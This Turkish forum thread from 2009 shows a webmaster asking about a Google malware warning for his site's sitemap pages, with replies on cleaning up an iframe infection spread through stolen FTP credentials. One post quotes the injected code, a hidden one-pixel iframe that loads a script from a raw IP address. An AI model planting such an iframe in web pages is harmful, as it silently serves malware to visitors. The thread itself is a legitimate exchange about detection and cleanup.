• 29-05-2009, 10:34:18
    #1
    arkadaşlar az önce siteme ait mail hesabımı kontrol ettiğim zaman spam mailleri temizliyordum. Hepsini silerken noreply@google.com gördüm bi okuyayım dedim. ingilizce olduğu için buraya yazıyorum.

    Alıntı
    Dear site owner or webmaster of bykus.org,


    We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

    Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

    http://bykus .org/sitemap/
    http://www.bykus .org/sitemap/
    http://www.bykus .org/sitemap/16.html

    Here is a link to a sample warning page:
    http://www.google.com/interstitial?u...s.org/sitemap/

    We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

    1) the site was compromised
    2) the site doesn't monitor for malicious user-contributed content
    3) the site displays content from an ad network that has a malicious advertiser


    If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
    http://www.stopbadware.org/home/security

    Once you've secured your site, you can request that the warning be removed by visiting
    http://www.google.com/support/webmas...y?answer=45432
    and requesting a review. If your site is no longer harmful to users, we will remove the warning.

    Sincerely,
    Google Search Quality Team
    bu da translate çevirisi

    Alıntı
    Sevgili site sahibi veya bykus.org bir webmaster,


    Yakın zamanda, bazı sayfaları kullanıcıları kötü amaçlı yazılım bulaşmış olması neden olabilir keşfetti. Biz de on Google.com arama sonucu tıklayarak bu sayfaları ziyaret kullanıcıları için bir uyarı sayfası gösteren başladık.

    Aşağıda sitede hangi kullanıcıların virüslü (alanı yanlışlıkla tıklayarak önlemek için eklenecek neden bazı örnek URL'ler bulunmaktadır durumda posta istemcisi otomatik bağlantı URL):

    http://bykus .org / sitemap /
    http://www.bykus .org / sitemap /
    http://www.bykus .org/sitemap/16.html

    İşte örnek bir uyarı sayfası için bir link:
    http://www.google.com/interstitial?url=http% 3A / / bykus.org / sitemap /

    Sizi, bu hemen ziyaretçi korumak için soruşturma öneririz. Bazı sitelerde kasıtlı olarak, birçok durumda, kötü niyetli yazılım dağıtımı yöneticisi habersiz çünkü:

    1) site taviz oldu
    2) sitenin kötü niyetli kullanıcılar için kontrol etmez içerik katkıda
    3) site gösterir bir zararlı reklamverenin bir reklam ağı içerik


    Siteniz taviz olduğunu, sadece (ve genellikle) sayfalarınızın içerik, gizli zararlı kaldırmak değil ama önemli de tanıtmak ve açığı gidermek. Eğer ne kadar devam etmek emin değilseniz bizim için barındırma sağlayıcınıza başvurmanızı öneririz. StopBadware'in da güvence taviz siteler için bir kaynak sayfa var:
    StopBadware.org - Tips for Cleaning & Securing Your Website

    Sitenizdeki güvenli sonra, bu uyarı ziyaret ederek kaldırılmasını talep edebilirsiniz
    My site's been hacked - Webmasters/Site owners Help
    ve bir inceleme talep. Siteniz artık kullanıcılar için zararlı olduğu için, uyarı kaldıracağız.
    sitemin adı bykus.org
    yukarıdaki linklere tıklayınca tarayıcan direk google aramasına yonleniyor. ama siteye girip en aşağıdaki bağlantılara (sitemap falan) saldırgan site uyarısı veriyor ama site genelinde bu uyarıyı vermiyor. Ne yapmam lazım arkadaşlar? bu mailin tam çevirisi ve anlatmak istediği nedir? virüs kontrolü yaptım ama iframe virüsü bulamadım.
  • 29-05-2009, 10:39:28
    #2
    mail adresin muhtemelen admin(@)bykus.org webmaster(@)bykus.org support(@)bykus.org, contact(@)bykus.org v.b şeklindedir.. çünkü google bir siteye bir yaptırımda (sandbox, filtre, saldırgan site olarak fişleme) bulunmadan önce bu tür mail adresleriyle iletişime geçmeyi dener...
    google sitende virüs var temizle diyor..
    sanırım o uyarı veren kısımlarda kod vardır..
    şu son zamanlarda yayılan iframe virüsü..
    daha fazla yayılmadan temizlemen iyi olacaktır..
  • 29-05-2009, 10:46:14
    #3
    evet hasan mail adresim öyle. sitemap lerde virüs olabilir değil mi?
  • 29-05-2009, 10:47:52
    #4
    sitemapları kendin oluşturduysan evet olabilir..
    ama yok php dosyalarla kendisi sitemap oluşturuyorsa, o zman virüs o php dosyalarındadır..
  • 29-05-2009, 10:49:54
    #5
    yok php dosyası. Otomatik kendi sitemap oluşturuyor. İndirdim şimdi kontrol ettim. ve sonuç

    Alıntı
    <iframe src="http://91.212.41.241/in.php" width=1 height=1 style="visibility:hidden"></iframe>
  • 29-05-2009, 10:51:58
    #6
    hadi geçmiş olsun..
    iyice bi incele başka uyarı veren bölüm varsa onlarada bakıver
    sonrasında webmaster toolstanda acıklı bir değerlendirme isteğinde bulun
    birşey olmaz inş..
  • 29-05-2009, 10:59:33
    #7
    son zamanların güncel virusunden yemişsin.
    sitende cuteftp falan varsa, virus şifreni elegeçirip karşıya gönderiyor.
    cuteftp yi silsen bile adamların elinde şifre olduğu için otomatik olarak tüm alt klasörlerinde içindeki index dosyalar olmak üzere adı index.php default.php index.html index.htm default.asp default.aspx gibi dosyalara otomatik bulaşıyor.
    ftp şifreni degiştir ve cuteftp kullanıyorsan şifreleri kayıt etme.
    muhtemelen virus sitemap/index.xml dosyanada bulaşmıştır.

    adı index olan tüm dosyalarını ve alt klasörlerinin içindekileri temizlersen tamamdır
  • 29-05-2009, 11:05:04
    #8
    Dostum benim de başıma gelmişti. Hostin sahibine bildirdim. Konuyu hemen inceleyip server'i temizledi. Aynı server üzerinde başka sitelere de bulaşmıştı. Belki de onlardan gelmişti.

    Bir başka yolu da sitendeki tüm dosyaları bilgisayarına indirerek birkaç anti-virüs programı ile taratmandır.

    Bunlar özellike Kaspersky, Avast ve Nod32'dir.

    Selamlarımı sunuyorum.
  • 29-05-2009, 11:28:56
    #9
    Yorumlarınız için teşekkürler. Aslında ben bu virüsü yaklaşık olarak 1 1.5 ay önce falan yemiştim. resel hesabımdaki tüm sitelerinde index lerine bulaşmıştı. Bende temiz yedekleri tekrardan kurarar, ftp şifremi değiştirererk ve dosya izinlerini de azaltaraktan kurtulmuştum. Ama forum sitemin otomatik sitemap oluşturan ftp deki sitemap klasörüne hiç dokunmamıştım. onun içinde de index.php var. virüs ona bulaşmış. Şimdi diğer sitelerime baktım indexlerinde falan bir sorun yok. Sadece siteadı.com/sitemap bağlantısında saldırgan site uyarısı ve virüs vardı. Şimdi virüs ü temizledim. inş önceden kalan virüs parçasıdır